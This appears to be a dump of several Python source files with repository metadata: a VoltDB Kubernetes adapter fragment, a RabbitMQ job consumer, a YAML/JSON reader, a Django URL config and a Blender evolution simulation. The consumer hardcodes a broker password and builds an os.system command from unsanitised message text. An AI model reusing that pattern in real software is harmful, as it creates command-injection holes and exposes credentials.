args.append(op)
args.append(value)
else: # replace
args[ix] = value
def find_arg_index(args, arg):
for i in range(0, len(args)):
if args[i] == arg:
return i+1
return None
####
# Hostname utilities
# Hostname is like pear-1.pear.default.svc.cluster.local
# which is ssname-PODORDINAL.FQDOMAIN
def get_fqhostname():
return os.getenv('VOLTDB_K8S_ADAPTER_FQHOSTNAME', socket.getfqdn())
def split_fqhostname(fqdn):
try:
hostname, domain = fqdn.split('.', 1)
ssp = hostname.split('-')
pod = ssp[-1]
if pod.isdigit(): pod = int(pod)
hn = ('-'.join(ssp[0:-1]), pod, hostname, domain)
except:
return None
return hn # returns (ss-name, pod-ordinal, hostname, domain)
####
# Logging setup.
# We set up console logging to stderr, where it can be found
# by 'kubectl logs PODNAME', and to the same log file that
# VoltDB itself uses. The latter is not available before we
# have run 'voltdb init' for the first time.
def setup_logging(ssname):
logger = logging.getLogger()
logger.setLevel(logging.NOTSET)
logger.propagate = True
log_format = '%(asctime)s %(levelname)-8s %(filename)14s:%(lineno)-6d %(message)s'
formatter = logging.Formatter(log_format)
loglevel = get_loglevel('VOLTDB_K8S_ADAPTER_LOG_LEVEL', logging.INFO)
logger.handlers = []
# Console
console = logging.StreamHandler()
console.setLevel(loglevel)
console.setFormatter(formatter)
logger.addHandler(console)
logto = 'console'
# And the volt log file if possible
volt_log = find_volt_log(ssname)
if volt_log:
file = logging.FileHandler(volt_log, 'a')
file.setLevel(loglevel)
file.setFormatter(formatter)
logger.addHandler(file)
logto += ' and ' + volt_log
# Note loggng destination
logging.info("Logging to %s", logto)
_logmap = { 'DEBUG':logging.DEBUG, 'INFO':logging.INFO, 'WARNING':logging.WARNING, 'ERROR':logging.ERROR }
def get_loglevel(envar, deflt):
logstr = os.getenv(envar)
if logstr is not None:
logstr = logstr.upper()
if logstr in _logmap:
return _logmap[logstr]
return deflt
def find_volt_log(ssname):
volt_log = os.path.abspath(os.path.join(PV_MOUNTPT, ssname, VOLTDBROOT, 'log', 'volt.log'))
if os.path.exists(volt_log):
return volt_log
log_dir = os.path.abspath(os.path.join(PV_MOUNTPT, ssname, VOLTDBROOT, 'log'))
if os.path.exists(log_dir):
return volt_log
return None
####
# Usual entry point
if __name__ == "__main__":
try:
main()
except:
logging.error("Last chance handler: %s", format_exc())
logging.error("==TERMINATED==")
sys.exit(-1)
| [
"george.smith@altoros.com"
] | george.smith@altoros.com | |
d0b82243f2f566c97ca61981f2fe732363eeb5ad | 90f0c803a1b905aeff9a9fc67a82267bd8711484 | /getJob.py | cbe1a3113f63ba15a914326a10f4ed9a20f27f45 | [] | no_license | cdemircioglu/ORTest | f4ee02f2f01bf10ff3c49ce063a6542cb96aeaf8 | 0a0082e1072799f679ec6b4dd985e718409b276d | refs/heads/master | 2021-01-11T02:57:56.528509 | 2016-12-22T07:00:26 | 2016-12-22T07:00:26 | 70,874,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | #!/usr/bin/env python
import pika
import sys
import subprocess
import time
import os
print sys.argv[1]
credentials = pika.PlainCredentials('controller', 'KaraburunCe2')
parameters = pika.ConnectionParameters('HWLinux',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.queue_declare(queue=sys.argv[1])
def callback(ch, method, properties, body):
print(" [x] Received %r" % body)
time.sleep(5)
print(" [x] Done")
os.system("/usr/bin/Rscript --vanilla RWorker_test.R \"" + body + "\"")
ch.basic_ack(delivery_tag = method.delivery_tag)
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback,queue=sys.argv[1])
channel.start_consuming()
| [
"c81021292@china.huawei.com"
] | c81021292@china.huawei.com |
b2051e9fb5b2093734a94ebbbb2b4dbcd3731a38 | 719a8b314ee5b477c8d61bd685f84f0a73310b07 | /class1/read_jsonyaml.py | be760242252464d77c2601ce4b26f1542e97f0ce | [] | no_license | jvascousa/pynet_class | e278a11c69f0f966bcd1752770fe14538802e36d | 896571dcad23447502b557f2837f96dabd4f8541 | refs/heads/master | 2021-01-11T02:22:07.186495 | 2016-10-29T23:32:02 | 2016-10-29T23:32:02 | 70,972,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | #!/usr/bin/env python
import yaml
import json
from pprint import pprint
def output_print(my_list,my_str):
print '\n\n'
print '#' * 3
print '#' * 3 + my_str
print '#' * 3
pprint(my_list)
def main():
yaml_file = 'yaml_test.yaml'
json_file = 'json_file.json'
with open(yaml_file) as f:
yaml_list = yaml.load(f)
with open(json_file) as f:
json_list = json.load(f)
output_print(yaml_list,'YAML')
output_print(json_list,'JSON')
if __name__ == "__main__":
main()
| [
"jvascousa@gmail.com"
] | jvascousa@gmail.com |
874d0a89668922462ad058aefcd0701876771879 | 54e4c67cd295283532387975801c98300fcf7925 | /django_hosts_tutorial/help/urls.py | 5e4ee8bb781ffee7d48342674c80a6d34f28e82e | [] | no_license | ThusithaDeepal/Django-dynamic-subdomai-tutorial | 16ea8a71687766ed286942a988891fb8277acc0f | 0f06ce10db6aa19abcb4189ba66447debb1c97b6 | refs/heads/master | 2021-06-10T07:38:29.362445 | 2021-05-18T09:41:28 | 2021-05-18T09:41:28 | 184,202,571 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | from django.conf.urls import url,include
from help import views
urlpatterns=[
url(r'^$',views.home,name='home'),
url(r'^articles/$', views.articles, name='articles'),
] | [
"noreply@github.com"
] | noreply@github.com |
61d43a1943726db6691f8d8f151c4e7ef7359254 | 87f9f2701c6fbbb7804123dcff31760da3477be2 | /blender_scripts/tools/natural_sim.py | 3926dbec844cc7db3ab8b8827f3e3d4fd8f3ee66 | [] | no_license | syedfaizanhussain94/Simulations-master | f023bdac5135f32e17bcfa677a708fd77da8c0ed | 8d38567363102d5c896397b027b73e9d6ed585a9 | refs/heads/master | 2021-03-05T21:52:04.796320 | 2020-05-28T19:25:49 | 2020-05-28T19:25:49 | 246,155,544 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83,252 | py | #import bpy
import imp
from random import random, uniform, randrange
from copy import copy
import pickle
import bobject
imp.reload(bobject)
from bobject import *
import blobject
import helpers
imp.reload(helpers)
from helpers import *
#Sim constants
WORLD_DIMENSIONS = [150, 150]
SIM_RESOLUTION = 1 #0.25
DEFAULT_DAY_LENGTH = 600 * SIM_RESOLUTION
PREDATOR_SIZE_RATIO = 1.2 #Vals close to 1 apply strong pressure toward bigness,
#since it becomes possible to eat recent ancestors.
SPEED_ADJUST_FACTOR = 1.0 #Scale speed to keep creature speeds in the 0-2 range
#for graphing. Units are arbitrary anyway, so this is
#easier than adjusting all the distances.
SIZE_ADJUST_FACTOR = 1.0
HEADING_TARGET_VARIATION = 0.4 #Range for random heading target changes, radians
MAX_TURN_SPEED = 0.07 / SIM_RESOLUTION
TURN_ACCELERATION = 0.005 / SIM_RESOLUTION
BASE_SENSE_DISTANCE = 25
EAT_DISTANCE = 10
HELP_REP_BOOST = 0.5 #Reproduction chance improvement creatures get by helping
FAMILY_JUMPS = 3
KIN_ALTRUISM_RADIUS = 0
MUTATION_CHANCE = 0.05
MUTATION_VARIATION = 0.1
STARTING_ENERGY = 800 #1800
HOMEBOUND_RATIO = 2# 1.5
SAMARITAN_RATIO = 1.1
#Visual constants
DEFAULT_DAY_ANIM_DURATION = 4 #seconds
BLENDER_UNITS_PER_WORLD_UNIT = 1 / 40
FOOD_SCALE = 2 * BLENDER_UNITS_PER_WORLD_UNIT
BASE_CREATURE_SCALE = 0.25
CREATURE_HEIGHT = 0.65 * BASE_CREATURE_SCALE / BLENDER_UNITS_PER_WORLD_UNIT
SPEED_PER_COLOR = 0.3 #Speed change for one color unit change
DEFAULT_ANIM_DURATIONS = {
'dawn' : 0.5, #Put out food and creatures
'morning' : 0.25, #pause after setup
'day' : DEFAULT_DAY_ANIM_DURATION, #creatures go at it
'evening' : 0.25, #pause before reset
'night' : 0.5 #reset
}
'''DEFAULT_ANIM_DURATIONS = {
'dawn' : 1, #Put out food and creatures
'morning' : 0.5, #pause after setup
'day' : DEFAULT_DAY_ANIM_DURATION, #creatures go at it
'evening' : 0.5, #pause before reset
'night' : 1 #reset
}'''
"""
TODOs
- Arrange sims/graph as it will be in the video
- Work on fast-forward sims (Seems to work fine, actually)
- Rebalance using non-animated sims to get a sense for things more quickly
- Multiplying to get total cost encourages extreme tradeoffs, making the traits
that matter less (sense) into dump stats.
- Speed and size are highly competitive. There doesn't seem to be a way of
making them bimodal without a change in behavior. A slow creature might be
able to get by, but the faster creatures will multiply and quickly eat all
the food. Having small creatures run from big creatures might be a behavioral
trick to encourage multiple strategies. (You can be small if you have good
senses and speed.)
- Visual
- Make food not appear close to edge.
- Distinguish border, by covering or otherwise. Smoke?
Perhaps unnecessary
- Make creatures run from larger ones. (If can't balance)
- Break eating ties (Not sure if necessary)
- Reuse dead creature objects and old food objects
(maybe even resize/recolor for extra smoothness)
Postponing this because the childof constraints add complexity to this task
And it only affects blender's UI responsiveness (and possibly render time)
Might try again later, but not necessary now.
- Fix teleportation bugs
Food sometimes appears below the plane. Could be related to immediate eating?
Not super common, so might say meh. You can't even see it.
Parameter considerations
- Avg number of creatures. Tradeoff between simplicity/speed and stability
- Creature density. More direct competition.
- Makes size better, since there are more creature interactions.
- Makes sense worse, since you're more likely to sense others
even with low sense.
- Makes speed better, since there is more predation and direct food
competition.
- Food density. Effects similar to those of creature density. They should also
track each other closely.
- Starting energy vs world size.
- Makes low stats better because of efficiency.
- May actually make sense more valuable, though, since that adds efficiency.
Learnings:
- It seems like it was a bad call to use bobjects and bobject methods for the
sim. Bobjects and their methods are made to be easy to use for arranging
objects manually throughout a scene, but when embedded in automated structures,
they cause two problems. First, methods like bobject.move_to() place a starting
keyframe and ending keyframe. This can cause durations to overlap, creating
confused motions. Second, the bobject methods generally use seconds as the
time unit. This is all well and good when thinking directly about a timeline,
but using them alongside the blender api creates a need to convert units often,
giving many chances for confusion, bugs, and ugliness.
EDIT: This might be okay as long as objects in blender aren't reused for
multiple sim objects, which is where the overlapping keyframe confusion seems
to occur.
- Managing the double-parent relationships has proven difficult. It may have been
better to have a childof constraint rather than full parenting of the food,
since the constraints can simply be turned off.
"""
class CreatureDay(object):
"""docstring for CreatureDay."""
def __init__(
self,
creature = None,
date = 0
):
if creature == None:
raise Warning("CreatureDay must belong to a creature")
self.creature = creature
self.date = date
#These only need to be lists if animated, and not all will be, but
#I'm making them all lists in case I decide to animate the value in
#some way down the road.
#Lots of heading to make turns smooth
self.heading_targets = []
self.d_headings = [] #Turn rate
self.headings = []
self.locations = []
self.has_eaten = []
self.energies = []
self.states = []
self.has_helped = 0
self.dead = False
self.death_time = None
self.home_time = None
class Food(object):
"""docstring for Food."""
def __init__(
self,
world_location = [0, 0, 0],
parents = [],
world = None
#has_world_as_parent = True
):
self.world_location = world_location
self.world = world
self.is_eaten = False
#self.was_shared = False
'''if isinstance(parents, list):
self.parents = parents
else:
self.parents = [parents]'''
#self.parents.append(self.world)
def git_ate(
self,
eater = None,
start_time = None,
time_step = 0.3,
drawn_world = None
):
if start_time == None:
raise Warning('Need start time for git_ate')
#Make sure these are on frames
#start_time = round(start_time * 60) / 60
start_frame = math.floor(start_time * 60)
duration = 50 * time_step * SIM_RESOLUTION
#50 is duration of eat animation in world time
#Should really be a constant
duration_frames = max(math.floor(duration * 60), 3)
#end_time = start_time + duration
end_frame = start_frame + duration_frames
if drawn_world == None:
raise Warning('Need to define drawn_world for git_ate')
if eater == None:
raise Warning("Need to define eater")
#if eater not in self.parents:
self.make_child_of_constraint(parent = eater.bobject.ref_obj)
'''for cons in self.bobject.ref_obj.constraints:
cons.keyframe_insert(data_path = 'influence', frame = start_frame)
if cons.target == eater.bobject.ref_obj:
cons.influence = 1
else:
cons.influence = 0
cons.keyframe_insert(data_path = 'influence', frame = start_frame + 1)'''
for cons in self.bobject.ref_obj.constraints:
if cons.target == eater.bobject.ref_obj:
cons.keyframe_insert(data_path = 'influence', frame = start_frame)
cons.influence = 1
cons.keyframe_insert(data_path = 'influence', frame = start_frame + 1)
#There is almost certainly a more elegant way to do this, but there are
#several transformation matrices which don't seem to reliably update,
#and there's an extra complication because the 'parent' in the childof
#constraint has the same parent as the food object, making the real parent
#affect the transform twice.
#I gave up and did a more manual calculation of the location.
rel = (self.bobject.ref_obj.location - eater.bobject.ref_obj.location)
ang = eater.bobject.ref_obj.rotation_euler[2]
sca = eater.size * BASE_CREATURE_SCALE #eater.bobject.ref_obj.scale
#Above line refers to creature property rather than object property in
#blender, since I ran into a bug where the blender object was scaled to
#zero (not keyframed) when this code executes. The creature property should
#be the intended value and not change.
loc_in_new_ref_frame = [
(rel[0] * math.cos(-ang) - rel[1] * math.sin(-ang)) / sca,#[0],
(rel[0] * math.sin(-ang) + rel[1] * math.cos(-ang)) / sca,#[1],
rel[2] / sca,#[2]
]
#Need to correct scale because the child_of constraint doesn't use scale
#The intent is to not affect the scale of the object itself, but the
#scale of the eater should be used to determine the position. So that's
#here.
for i in range(len(loc_in_new_ref_frame)):
loc_in_new_ref_frame[i] *= eater.bobject.ref_obj.scale[i]
#Subtract the contribution of the common parent (so it just contributes once)
corrected_loc = [
loc_in_new_ref_frame[0] - eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0],
loc_in_new_ref_frame[1] - eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
loc_in_new_ref_frame[2] - eater.bobject.ref_obj.parent.location[2] / eater.bobject.ref_obj.parent.scale[2],
]
#Rotation should be part of the childof constraint for the purpose of
#updating location, but the object itself shouldn't rotate.
#So subtract the eater's rotation.
corrected_rot = [
self.bobject.ref_obj.rotation_euler[0] - eater.bobject.ref_obj.rotation_euler[0],
self.bobject.ref_obj.rotation_euler[1] - eater.bobject.ref_obj.rotation_euler[1],
self.bobject.ref_obj.rotation_euler[2] - eater.bobject.ref_obj.rotation_euler[2],
]
#Store differences to return for subclass implementation
#When eaten, creatures should correct locations of things they've eaten
#to avoid those things teleporting. This is a mess, eh?
loc_diff = add_lists_by_element(
corrected_loc,
self.bobject.ref_obj.location,
subtract = True
)
rot_diff = add_lists_by_element(
corrected_rot,
self.bobject.ref_obj.rotation_euler,
subtract = True
)
#Change location to be the same in new reference frame
self.bobject.move_to(
start_frame = start_frame,
end_frame = start_frame + 1,
new_location = corrected_loc,
new_angle = corrected_rot
)
#Move in front of creature
self.bobject.move_to(
start_frame = start_frame + 1,
end_frame = start_frame + math.floor(duration_frames / 2),
new_location = [
- eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0] + eater.bobject.ref_obj.scale[2],
- eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
eater.bobject.ref_obj.scale[2] / 5
]
)
#Move into creature and shrink
self.bobject.move_to(
start_frame = start_frame + math.ceil(duration_frames / 2),
end_frame = end_frame,
new_location = [
- eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0],
- eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
eater.bobject.ref_obj.scale[2] / 5
],
new_scale = 0
)
eater.eat_animation(start_time = start_time, time_step = time_step)
eater.bobject.blob_scoop(start_time = start_time, duration = duration)
#I don't remember why I'm multiplying things by 50, tbh, but it works.
#I'm good at coding.
return loc_diff, rot_diff #, self.bobject.ref_obj
def make_child_of_constraint(self, parent = None):
if self.bobject == None:
raise Warning('Food needs a bobject to get parent')
constraints = self.bobject.ref_obj.constraints
make_new = True
for cons in constraints:
if cons.type == 'CHILD_OF' and cons.target == parent:
make_new = False
if make_new == True:
new_cons = self.bobject.ref_obj.constraints.new('CHILD_OF')
new_cons.use_scale_x = False
new_cons.use_scale_y = False
new_cons.use_scale_z = False
new_cons.influence = 0
if parent == None:
raise Warning('Need parent for child_of constraint')
new_cons.target = parent
'''def add_to_blender(self):
self.bobject = import_object(
'goodicosphere', 'primitives',
#world_location = [0, 0, 0],
location = [0, 0, 0],
scale = FOOD_SCALE
)
apply_material(self.bobject.ref_obj.children[0], 'color7')'''
class Creature(Food):
def __init__(
self,
speed = 1,
size = 1,
sense = 1,
altruist = False,
green_beard = False,
gbo = False,
a_gb = False,
kin_altruist = False,
kin_radius = 0,
parent = None,
world = None
):
super().__init__()
self.speed = speed
self.size = size
self.sense = sense
self.altruist = altruist
self.green_beard = green_beard
self.a_gb = a_gb
self.gbo = gbo
self.green_beard = green_beard
self.kin_altruist = kin_altruist
self.kin_radius = kin_radius
self.parent = parent
self.children = []
self.days = []
self.bobject = None
self.world = world
cost = 0
cost += (self.size * SIZE_ADJUST_FACTOR) ** 3 * (self.speed * SPEED_ADJUST_FACTOR) ** 2 #* 2
#cost += (self.size * SIZE_ADJUST_FACTOR) ** 3 / 2
cost += self.sense
self.energy_cost = cost / SIM_RESOLUTION
def new_day(self, date = 0):
new_day = CreatureDay(creature = self, date = date)
parent = self.parent
if len(self.days) == 0: #First day of life, ahhhh.
if parent == None or date == 0: #For initial creatures
loc, heading_target, heading = self.random_wall_placement()
new_day.locations.append(loc)
new_day.heading_targets.append(heading_target)
new_day.d_headings.append(0)
new_day.headings.append(heading)
elif parent != None:
#Perhaps not the most robust way to do it, but using days[-2]
#here because the parents make their new days before the
#children, since the children are added to the end of the
#creature list on their first day
new_day.locations.append(parent.days[-2].locations[-1])
new_day.heading_targets.append(
parent.days[-2].heading_targets[-1] + math.pi
)
new_day.d_headings.append(0)
new_day.headings.append(
parent.days[-2].headings[-1] + math.pi
)
else:
new_day.locations.append(
self.days[-1].locations[-1]
)
new_day.heading_targets.append(
self.days[-1].heading_targets[-1] + math.pi
)
new_day.d_headings.append(0)
new_day.headings.append(
self.days[-1].headings[-1] + math.pi
)
new_day.has_eaten.append([])
new_day.energies.append(self.world.initial_energy)
self.days.append(new_day)
def random_wall_placement(self):
wall_roll = random()
#print()
#print(wall_roll)
if wall_roll < 0.25:
#print('Top')
loc = [
uniform(-self.world.dimensions[0], self.world.dimensions[0]),
self.world.dimensions[1],
CREATURE_HEIGHT * self.size
]
heading_target = - math.pi / 2
heading = - math.pi / 2
elif wall_roll < 0.5:
#print('Right')
loc = [
self.world.dimensions[0],
uniform(-self.world.dimensions[1], self.world.dimensions[1]),
CREATURE_HEIGHT * self.size
]
heading_target = math.pi
heading = math.pi
elif wall_roll < 0.75:
#print('Bottom')
loc = [
uniform(-self.world.dimensions[0], self.world.dimensions[0]),
-self.world.dimensions[1],
CREATURE_HEIGHT * self.size
]
heading_target = math.pi / 2
heading = math.pi / 2
else:
#print('Left')
loc = [
-self.world.dimensions[0],
uniform(-self.world.dimensions[1], self.world.dimensions[1]),
CREATURE_HEIGHT * self.size
]
heading_target = 0
heading = 0
other_cres = [x for x in self.world.date_records[-1]['creatures'] if \
len(x.days) > 0]
for cre in other_cres:
cre_loc = cre.days[-1].locations[-1]
dist = vec_len(add_lists_by_element(cre_loc, loc, subtract = True))
if dist < EAT_DISTANCE:
self.random_wall_placement()
return loc, heading_target, heading
def take_step(self):
day = self.days[-1]
#This set of conditionals is a bit of a frankenstein monster. Could
#be streamlined.
has_energy = True
if day.energies[-1] == None:
has_energy = False
#print('HAS ENERGY IS FALSE')
else:
steps_left = math.floor(day.energies[-1] / self.energy_cost)
#print('Steps left = ' + str(steps_left))
distance_left = steps_left * self.speed * SPEED_ADJUST_FACTOR
if steps_left <= 1:
#For some reason, steps_left is never less than one, at least for
#integer energy costs. I can't figure out why. So, some creatures
#are going to take one fewer step than they could have. Meh.
#print(day.energies[-1])
#print(self.energy_cost)
has_energy = False
if has_energy == False and day.death_time == None and day.home_time == None:
day.death_time = len(day.locations)
day.dead = True
was_samaritan = False
for sta in day.states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
print("I ran out of energy after being a samaritan!")
print(day.locations[-1])
if self.days[-1].dead == True:
day.heading_targets.append(None)
day.d_headings.append(None)
day.headings.append(None)
day.locations.append(None)
self.world_location = None
day.has_eaten.append(copy(day.has_eaten[-1]))
day.energies.append(None)
else:
day.has_eaten.append(copy(day.has_eaten[-1])) #Append new eaten state to fill with food
"""Update heading based on state"""
state = None
distance_out = min(
self.world.dimensions[0] - abs(day.locations[-1][0]),
self.world.dimensions[1] - abs(day.locations[-1][1]),
)
if len(day.has_eaten[-1]) == 0:
state = 'foraging'
elif len(day.has_eaten[-1]) == 1:
#print(day.locations[-1])
#print(distance_out)
#print(distance_left)
last_state = None
try:
last_state = day.states[-1]
except:
pass
#print(last_state)
if distance_left < distance_out * HOMEBOUND_RATIO or \
last_state == 'homebound':
state = 'homebound'
else:
state = 'foraging'
#print(state)
elif len(day.has_eaten[-1]) > 1:
state = 'homebound'
else:
raise Warning('Somehow, the creature has eaten negative or fractional food')
if state == 'homebound' and \
len(day.has_eaten[-1]) > 1 and \
distance_left > distance_out * HOMEBOUND_RATIO * SAMARITAN_RATIO:
state = 'samaritan'
new_heading = None
#Sense food. Eat if in eat range. If not, set new_heading toward
#closest food sensed. (New heading can be overridden if creature
#is fleeing or homebound)
closest_food_dist = math.inf
target_food = None
food_objects = self.world.date_records[day.date]['food_objects']
remaining_food = [x for x in food_objects if x.is_eaten == False]
close_food = [x for x in remaining_food if vec_len(add_lists_by_element(x.world_location, day.locations[-1], subtract = True)) < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense]
creatures = self.world.date_records[day.date]['creatures']
live_creatures = [x for x in creatures if x.days[-1].dead == False]
close_creatures = [x for x in live_creatures if vec_len(add_lists_by_element(x.world_location, day.locations[-1], subtract = True)) < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense]
if self.altruist == True:
#print('altruist')
to_be_nice_to = close_creatures
elif self.green_beard == True:
#print("green beard")
to_be_nice_to = [x for x in close_creatures if x.green_beard == True]
elif self.a_gb == True:
to_be_nice_to = [x for x in close_creatures if x.gbo == True]
elif self.kin_altruist == True:
#to_be_nice_to = [x for x in close_creatures if \
# ((x.size - self.size) ** 2 + (x.speed - self.speed) ** 2 + \
# (x.sense - self.sense) ** 2) ** (1/2) < KIN_ALTRUISM_RADIUS]
fam = [self]
fam_to_check = [self]
for i in range(FAMILY_JUMPS):
new_fam = []
for cre in fam_to_check:
if cre.parent != None and cre.parent not in fam:
new_fam.append(cre.parent)
for chi in cre.children:
if chi not in fam:
new_fam.append(chi)
fam = fam + new_fam
fam_to_check = new_fam
to_be_nice_to = [x for x in close_creatures if x in fam]
#to_be_nice_to = [x for x in live_creatures if x.parent == self or self.parent == x]
#Gave kin altruists the ability to go help any related creature
#regardless of distance, to increase the number of interactions
else:
to_be_nice_to = [x for x in close_creatures if \
((x.size - self.size) ** 2 + (x.speed - self.speed) ** 2 + \
(x.sense - self.sense) ** 2) ** (1/2) < self.kin_radius]
#print(len(to_be_nice_to))
if state == 'samaritan':
to_be_helped = None
to_be_helped_dist = math.inf
for cre in to_be_nice_to:
if len(cre.days[-1].has_eaten[-1]) == 0:
vec_to_help = add_lists_by_element(
cre.days[-1].locations[-1],
self.days[-1].locations[-1],
subtract = True
)
dist = vec_len(vec_to_help)
if dist < to_be_helped_dist:
to_be_helped_dist = dist
to_be_helped = cre
if to_be_helped != None:
if dist < EAT_DISTANCE:
#Give food
to_be_helped.days[-1].has_eaten[-1].append(
self.days[-1].has_eaten[-1].pop()
)
self.days[-1].has_helped += 1
day.states.append(str(state)) #Make sure to count samaritan attempt
if distance_left < distance_out * HOMEBOUND_RATIO:
state = 'homebound'
else:
state = 'foraging'
else:
#print('Heading to give food')
new_heading = math.atan2(vec_to_help[1], vec_to_help[0])
else:
state = 'homebound'
#print("Nobody to help")
#Forget about food that another slower-but-similar creature is going
#for,
#if you're not about to starve
#if len(day.has_eaten[-1]) > -1:
'''for cre in to_be_nice_to:
if cre.speed < self.speed and len(day.has_eaten[-1]) > 0:
claimed_food = None
claimed_food_dist = math.inf
for food in close_food:
dist = vec_len(add_lists_by_element(food.world_location, cre.days[-1].locations[-1], subtract = True))
if dist < EAT_DISTANCE + BASE_SENSE_DISTANCE * cre.sense:
if dist < claimed_food_dist:
claimed_food_dist = dist
claimed_food = food
#print(" Leaving a food for that creature ")
if claimed_food != None:
close_food.remove(claimed_food)'''
#Who to eat?
edible_creatures = [x for x in close_creatures if x.is_eaten == False and \
x.size * PREDATOR_SIZE_RATIO <= self.size and \
x.days[-1].home_time == None] #You're safe when you're home
#Don't eat similar creatures you're nice to
#if you're not about to starve
#if len(day.has_eaten[-1]) > 0:
# edible_creatures = [x for x in edible_creatures if x not in to_be_nice_to]
visible_food = edible_creatures + close_food
for food in visible_food:
try:
dist = vec_len(add_lists_by_element(
food.world_location,
day.locations[-1],
subtract = True
))
except:
print(food.world_location)
print(day.locations[-1])
if dist < EAT_DISTANCE and len(day.has_eaten[-1]) < 2:
if isinstance(food, Creature):
food.days[-1].dead = True
food.days[-1].death_time = len(food.days[-1].locations)
for nom in food.days[-1].has_eaten[-1]:
day.has_eaten[-1].append(nom)
was_samaritan = False
for sta in food.days[-1].states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
print("I was eaten after being a samaritan!")
day.has_eaten[-1].append(food)
food.is_eaten = True
#print('Heyyyyyy')
#TODO: Remove later to deal with ties.
elif dist < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense \
and dist < closest_food_dist:
closest_food_dist = dist
target_food = food
#print(state)
if state == 'foraging' and target_food != None:
vec_to_food = add_lists_by_element(
target_food.world_location,
day.locations[-1],
subtract = True
)
new_heading = math.atan2(vec_to_food[1], vec_to_food[0])
#Wander around waiting to sense food.
if state == 'foraging' and target_food == None:
rand = uniform(-HEADING_TARGET_VARIATION, HEADING_TARGET_VARIATION)
#Check whether creature is close to edge
#Could make this more robust for non_square worlds if necessary
TURN_DISTANCE = 60
loc = day.locations[-1]
if max(abs(loc[0]), abs(loc[1])) + TURN_DISTANCE > \
self.world.dimensions[0]:
ht = day.heading_targets[-1] #angle in radians
atc = math.atan2(loc[1], loc[0]) + math.pi #angle to center
correction = atc - ht
rand = correction
new_heading = day.heading_targets[-1] + rand
#print(new_heading)
#Check for predators. If one is close, abandon foraging and flee
closest_pred_dist = math.inf
threat = None
#creatures = self.world.date_records[day.date]['creatures']
predators = [x for x in close_creatures if \
x.size >= self.size * PREDATOR_SIZE_RATIO]
'''safe_to_help = []
for pred in predators:
safe = False
if pred.altruist == True:
safe = True
if pred.green_beard == True and self.green_beard == True:
safe = True
if ((pred.size - self.size) ** 2 + (pred.speed - self.speed) ** 2 + \
(pred.sense - self.sense) ** 2) ** (1/2) < pred.kin_radius:
safe = True
if safe == True:
safe_to_help.append(pred)
predators = [x for x in predators if x not in safe_to_help]'''
for pred in predators:
try:
dist = vec_len(
add_lists_by_element(
pred.days[-1].locations[-1],
day.locations[-1],
subtract = True
)
)
except:
print(pred.days[-1].locations[-1]),
print(day.locations[-1])
raise()
if dist < closest_pred_dist:
closest_pred_dist = dist
threat = pred
if threat != None:
state = 'fleeing'
if state == 'fleeing':
#day.heading_targets.append(day.heading_targets[-1])
vec_to_pred = add_lists_by_element(
threat.world_location,
day.locations[-1],
subtract = True
)
angle_to_pred = math.atan2(vec_to_pred[1], vec_to_pred[0])
#print(angle_to_pred)
new_heading = angle_to_pred + math.pi
if state == 'homebound': #Creature is full or has eaten and is tired
if self.world.dimensions[0] - abs(day.locations[-1][0]) < \
self.world.dimensions[1] - abs(day.locations[-1][1]):
#Go in x-direction
if day.locations[-1][0] > 0:
target = 0
else:
target = math.pi
else:
if day.locations[-1][1] > 0:
target = math.pi / 2
else:
target = - math.pi / 2
new_heading = target
#print('heading home')
day.states.append(state)
#Add new_heading to the heading_targets list
#print(new_heading)
day.heading_targets.append(new_heading)
#Calculate heading
#Note that lists are of different lengths in the line below
heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
#Make sure abs(heading_discrepancy) <= 2pi
while heading_discrepancy > math.pi:
day.heading_targets[-1] -= 2 * math.pi
heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
while heading_discrepancy < -math.pi:
day.heading_targets[-1] += 2 * math.pi
heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
if heading_discrepancy == 0:
d_d_heading = 0
else:
d_d_heading = heading_discrepancy / abs(heading_discrepancy) \
* TURN_ACCELERATION
day.d_headings.append(day.d_headings[-1] + d_d_heading)
#Speed limit
if day.d_headings[-1] > MAX_TURN_SPEED:
day.d_headings[-1] = MAX_TURN_SPEED
elif day.d_headings[-1] < -MAX_TURN_SPEED:
day.d_headings[-1] = -MAX_TURN_SPEED
#Prevent overshooting
if heading_discrepancy == 0:
day.d_headings[-1] = 0
elif day.d_headings[-1] / heading_discrepancy > 1:
day.d_headings[-1] = heading_discrepancy
#No turning if you're out of energy or have gone home
if has_energy == False or day.home_time != None:
day.d_headings[-1] = 0
day.headings.append(day.headings[-1] + day.d_headings[-1])
"""Update location"""
#Go slower when turning, making it look more natural
effective_speed = self.speed * SPEED_ADJUST_FACTOR * \
(1 - pow(abs(day.d_headings[-1]) / MAX_TURN_SPEED, 2) / 2)
#If outside world, just stop
heading_vec = [math.cos(day.headings[-1]), math.sin(day.headings[-1]), 0]
if (abs(day.locations[-1][0]) >= self.world.dimensions[0] or \
abs(day.locations[-1][1]) >= self.world.dimensions[1]) and \
dot_product(heading_vec, day.locations[-1]) > 0:
effective_speed = 0
if day.home_time == None and len(day.has_eaten[-1]) > 0:
day.home_time = len(day.locations)
#No moving if you're out of energy
if has_energy == False:
effective_speed = 0
if day.dead == False:
if day.home_time == None:
raise Warning('Something with no anergy is alive...')
was_samaritan = False
for sta in day.states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
if day.home_time != None:
pass
#print("I have no energy after being a samaritan, but I'm home, so it's k.")
else:
